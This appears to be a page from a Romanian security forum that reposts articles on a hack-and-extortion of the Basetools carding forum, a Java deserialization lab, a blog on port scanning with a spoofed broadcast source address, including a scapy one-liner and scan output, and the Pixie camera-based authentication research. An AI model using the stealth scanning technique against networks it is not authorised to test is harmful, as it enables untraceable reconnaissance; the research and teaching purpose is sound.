Hacker Wants $50K From Hacker Forum or He'll Share Stolen Database With the Feds By Catalin Cimpanu October 26, 2017 Extortion can also be funny when it happens to the bad guys, and there's one extortion attempt going on right now that will put a big smile on your face. The victim is Basetools.ws, an underground hacking forum that allows users to trade stolen credit card information, profile data, and spamming tools. The site boasts to have over 150,000 users and over 20,000 tools listed in its forums. Earlier this week, on Tuesday, an anonymous user appears to have breached the site, and uploaded samples of its database online, along with a ransom demand. The attacker is asking for $50,000 or he'll share data on the site's administrator with US authorities, such as the FBI, DHS, DOJ, and the DOT (Department of Treasury). To prove the validity of his claims, the hacker shared an image of the Basetools admin panel and an image containing the site admin's login details and IP address. In addition, the hacker also dumped tools that Basetools users were selling on the site, such as login credentials for C-Panel accounts; login credentials for shells, backdoors, and spambots hosted on hacked sites; credentials for RDP servers; server SSH credentials, user data leaked from various breaches at legitimate sites, and many other more. As soon as the ransom demand and accompanying data was published online, the Basetools portal went offline and entered maintenance mode. "Yeah, the fact that site is down right now certainly doesn't look good for them," security researcher Dylan Katz told Bleeping Computer today regarding the possibility of the ransom demand being a fake breach. Nonetheless, "50k is a pretty steep ransom, seeing as the damange has already been done," Katz added. But financial gain is not the only motivation behind this hack. According to other text included in the ransom demand, the hacker also appears to have carried out the hack out of revenge, claiming the site's operator has been manipulating stats. "Basetools.pw is manipulating EARNING STATS & RESELLER STATS, Owner of this market has opened a reseller with name RedHat which always stays in First Place," the text reads. Lots of sensitive data leaked online Despite the "small potatoes" feel that you get when reading about a breach at a hackers' forum, this security incident is quite of note. All the Basetools seller data that was supposedly being sold on the forums before the hack is now online and easily accessible to anyone. This means that credentials for thousands of servers are now in easy reach to anyone who knows where to look for it. Other hackers could take over these servers and deploy them in spam, malware hosting, or other malicious campaigns. The owners of these services will need to be notified so they can change credentials and clean up affected systems. Furthermore, Katz has also identified user data that appears to come from services that have not previously announced they suffered a data breach. These services will also need to be notified so they can investigate any potential breaches, and reset passwords for affected accounts. Katz is currently processing the leaked data and intends to reach out to some of the affected parties. Sursa: https://www.bleepingcomputer.com/news/security/hacker-wants-50k-from-hacker-forum-or-hell-share-stolen-database-with-the-feds/
-
Lab for Java Deserialization Vulnerabilities This content is related to the paper written for the 12th edition of H2HC magazine. See full paper in: https://www.h2hc.com.br/revista/ Slides and video of the talk will be available soon. Um overview sobre as bases das falhas de desserialização nativa em ambientes Java (JVM) An overview of deserialization vulnerabilities in the Java Virtual Machine (JVM) Content The lab contains code samples that help you understand deserialization vulnerabilities and how gadget chains exploit them. The goal is to provide a better understanding so that you can develop new payloads and/or better design your environments. There is also a vulnerable testing application (VulnerableHTTPServer.java), which helps you test your payloads. Sursa: https://github.com/joaomatosf/JavaDeserH2HC
-
- 2
-
-
-
Port scanning without an IP address Posted: October 26, 2017 in midnight thoughts, security Re-evaluating how some actions are performed can sometimes lead to new insights, which is exactly the reason for this blog post. Be aware that Iâve only tested this on two âtestâ networks, so I cannot guarantee this will always work. Worst scenario youâll read an (hopefully) out-of-the-box blog entry about an alternative port scan method that maybe only works in weird corner cases. The source for the script can be found on my gist, if you prefer to skip my ramblings and jump directly to the source. One of the things I usually do is sniff traffic on the network that I am connected to with either my laptop or a drop device. At that point the output of the ifconfig command usually looks similar to this: eth0 Link encap:Ethernet HWaddr 00:0c:29:4b:e7:35 inet6 addr: fe80::20c:29ff:fe4b:e735/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:386316 errors:0 dropped:0 overruns:0 frame:0 TX packets:25286 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:390745367 (390.7 MB) TX bytes:4178071 (4.1 MB) Like you will notice the interface has no IPv4 IP address assigned, you can ignore the IPv6 address for now. Normally I determine which IP address or MAC address to clone based on the traffic that I captured and analysed previously. Then Iâm all set to start port scanning or performing other type of attacks. This time however I wondered what type of activities I could perform without an IP address. I mean it would be pretty interesting to talk IP to devices, somehow see a response and not be traceable, right? So I decided to see if it would for example be possible to perform a port scan on the network without having an IP address configured on my network interface. Since usually when you want to perform non-standard, weird or nifty tricks with TCP/IP you have to resort to raw socketsI decided to directly jump to scapy to build a POC. My working theory was as follow: Normally when I am just sniffing traffic I see all kind of traffic that gets send to the broadcast address, so what if we perform a port scan and we specify the broadcast address as the source? I decided to test this using two virtual machine (ubuntu & Windows 10) with the network settings on âNATâ and also tested with the same virtual machines while bridged to a physical network. The following oneliners can be used to transmit the raw packet: pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S') sendp(pkt,iface='eth0') Running tcpdump will confirm if this works or not, moment of truth: tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 23:27:21.903583 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 172.16.218.255.20 > 172.16.218.178.445: Flags [S], cksum 0x803e (correct), seq 0, win 8192, length 0 23:27:21.904440 IP (tos 0x0, ttl 128, id 31823, offset 0, flags [DF], proto TCP (6), length 44) 172.16.218.178.445 > 172.16.218.255.20: Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0 23:27:24.910050 IP (tos 0x0, ttl 128, id 31824, offset 0, flags [DF], proto TCP (6), length 44) 172.16.218.178.445 > 172.16.218.255.20: Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0 23:27:30.911092 IP (tos 0x0, ttl 128, id 31825, offset 0, flags [DF], proto TCP (6), length 44) 172.16.218.178.445 > 172.16.218.255.20: Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0 23:27:42.911498 IP (tos 0x0, ttl 128, id 31829, offset 0, flags [DF], proto TCP (6), length 40) 172.16.218.178.445 > 172.16.218.255.20: Flags [R], cksum 0x1af8 (correct), seq 3699222725, win 0, length 0 wOOOOOOOt!! It seems to work. We can clearly see the packet being sent to the â.178â IP address from the broadcast (.255) source address and then we see the response flowing back to the broadcast address. Now thatâs pretty interesting right? Essentially we can now perform port scans without being really traceable on the network. Somehow this still feels âweirdishâ because it just works on first tryâŚso still thinking I missed something :/ sudo ./ipless-scan.py 172.16.218.178 00:0c:29:f6:a5:65 -p 445 3389 5000 -i eth0 2017-10-26 23:13:33,559 - INFO - Started ipless port scan 2017-10-26 23:13:33,559 - INFO - Started sniffer and waiting 10s 2017-10-26 23:13:43,568 - INFO - Starting port scan 2017-10-26 23:13:43,604 - INFO - Found open port - 445 2017-10-26 23:13:43,628 - INFO - Found open port - 3389 2017-10-26 23:13:43,645 - INFO - Found closed port - 5000 2017-10-26 23:13:43,654 - INFO - Finished port scan, waiting 5s for packets 2017-10-26 23:13:52,626 - INFO - Stopped sniffer Sursa: https://diablohorn.com/2017/10/26/port-scanning-without-an-ip-address/
- 1 reply
-
- 4
-
-
Dovlecel, traiesti? PS: Nu am gasit un share OK pe care sa testez...
-
Uhuuu, simplu si frumos, merita incercat.
-
Deja se misca lucrurile: https://www.darkreading.com/attacks-breaches/new-tool-debuts-for-hacking-back-at-hackers-in-your-network/d/d-id/1330121
-
Camera-based, single-step two-factor authentication resilient to pictionary, shoulder surfing attacks A group of researchers from Florida International University and Bloomberg LP have created Pixie, a camera-based two-factor authentication system that could end up being a good alternative to passwords and biometrics-based 2FA options. About Pixie âPixie authentication is based on what the user has (the trinket) and what the user knows (the particular trinket among all the other objects that the user readily has access to, angle and viewpoint used to register the trinket),â the researchers explained. âPixie assigns the duty of storing the token for the second factor to a physical object outside the mobile device.â It combines the userâs secret and the second authentication factor, and the authentication is performed in a single step: with snapping a photo of the trinket. The trinket can be any item worn or carried everyday by the user â a watch, shoes, jewelry, shirt patterns, credit cards, logos, a piece of jewelry, a tattoo, and so on. The user doesnât have to use the whole item as the trinket, just a portion of it (e.g. a section of their shoes, a shirt pattern). âIn contrast to biometrics, Pixie enables users to change the authenticating physical factor, as they change accessories they wear or carry. This reduces the risks from an adversary who has acquired the authentication secret from having lifelong consequences for the victims, thereby mitigating the need for biometric traceability and revocation,â the researchers noted. Testing the solution The researchers performed a user study to see whether users would find this solution usable and helpful. Granted, the number of participants was small (42), but it showed that users had less trouble memorizing their trinket than their passwords, and half of them preferred it to passwords. As far as authentication speed, accuracy and resilience to attack are concerned, Pixie definitely looks promising. They implemented Pixie for Android on a HTC One smartphone, and found it processes a login attempt in half a second. The solution also achieves a False Accept Rate of 0.02% and a False Reject Rate of 4.25%, when evaluated over 122,500 authentication instances. âTo evaluate the security of Pixie, we introduce several image based attacks, including an image based dictionary (or âpictionaryâ) attack. Pixie achieves a FAR below 0.09% on such an attack consisting of 14.3 million authentication attempts constructed using public trinket image datasets and images that we collected online,â they shared. âSimilar to face based authentication, Pixie is vulnerable to attacks where the adversary captures a picture of the trinket. However, we show that Pixie is resilient to a shoulder surfing attack flavor where the adversary knows or guesses the victimâs trinket object type. Specifically, on a targeted attack dataset of 7,853 images, the average number of âtrials until successâ exceeds 5,500 irrespective of whether the adversary knows the trinket type or not.â Theyâve also developed features that enable the solution to reduce the effectiveness of a âmaster imageâ attack. Potential use Pixie can be used both as a standalone authentication solution and as a secondary one. According to the researchers, it could be ideal for remote service authentication through a mobile device scenario, but could also be used for authentication in camera-equipped cyber-physical systems. âFor instance, cars can use Pixie to authenticate their drivers locally and to remote services. Pixie can also authenticate users to remote, smart house or child monitoring systems, through their wearable devices. Further, door locks, PIN pads and fingerprint readers can be replaced with a camera through which users snap a photo of their trinket to authenticate,â they noted. âPixie can be used as an alternative to face based authentication when the users are reluctant to provide their biometric information (e.g. in home game systems where the user needs to authenticate to pick a profile before playing or to unlock certain functionalities). Pixie can also be used as an automatic access control checkpoint (e.g. for accessing privileged parts of a building). The users can print a visual token and use it to pass Pixie access control checkpoints.â There are, of course, authentication scenarios where Pixie would not be a good options, such as authentication in poor light conditions, or a high risk associated with external observers. The researchers have published Pixie (open source) code on GitHub, and an Android app on Google Play. Sursa: https://www.helpnetsecurity.com/2017/10/24/single-step-two-factor-authentication/
-
- 1
-
-
Doar o sugestie, poate ar fi mai OK ca lista de prezentari, pe zile, sa fie in Tab-uri: "Day 1" si "Day 2". @Andrei